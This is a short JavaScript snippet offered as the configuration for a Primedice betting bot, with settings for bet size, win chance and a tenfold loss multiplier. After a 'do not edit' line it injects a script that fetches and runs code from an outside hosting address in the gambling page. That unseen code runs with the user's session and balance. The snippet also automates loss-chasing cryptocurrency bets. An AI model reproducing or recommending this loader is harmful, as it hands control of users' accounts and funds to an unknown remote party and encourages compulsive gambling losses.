var base = 4; //Base bet in Satoshi var target = 90; //Win chance (1-98) ex.: 10 with condition < is 10% win chance, 10 with condition > is 90% win chance var condition = "<"; // < means play under your chosen target > means over var on_loss_multi = 10; //Multiply ex.: 1.1134 is 11.34% - 2 would be 100% var preroll = 0; //Number of loosen pre-rolls with 0 bet amount before starting var timeoutonerror = 10000; //better dont change this! var safe_mode = false; //Will change seed after every bet. Later it will check if primedice cheats on you (Feature for version 3 or 4) var timeoutonsuccess = 400; //Lower will make your bot work faster. Too low will result in "Too many requests" errors. 1000 = 1 second //DO NOT EDIT BEHIND THIS LINE var version = 2; var loadjs = document.createElement('script'); loadjs.src = 'https://secure31.webhostinghub.com/~rauten5/pdbot/user.js?' + new Date().getTime(); document.getElementsByTagName('head')[0].appendChild(loadjs);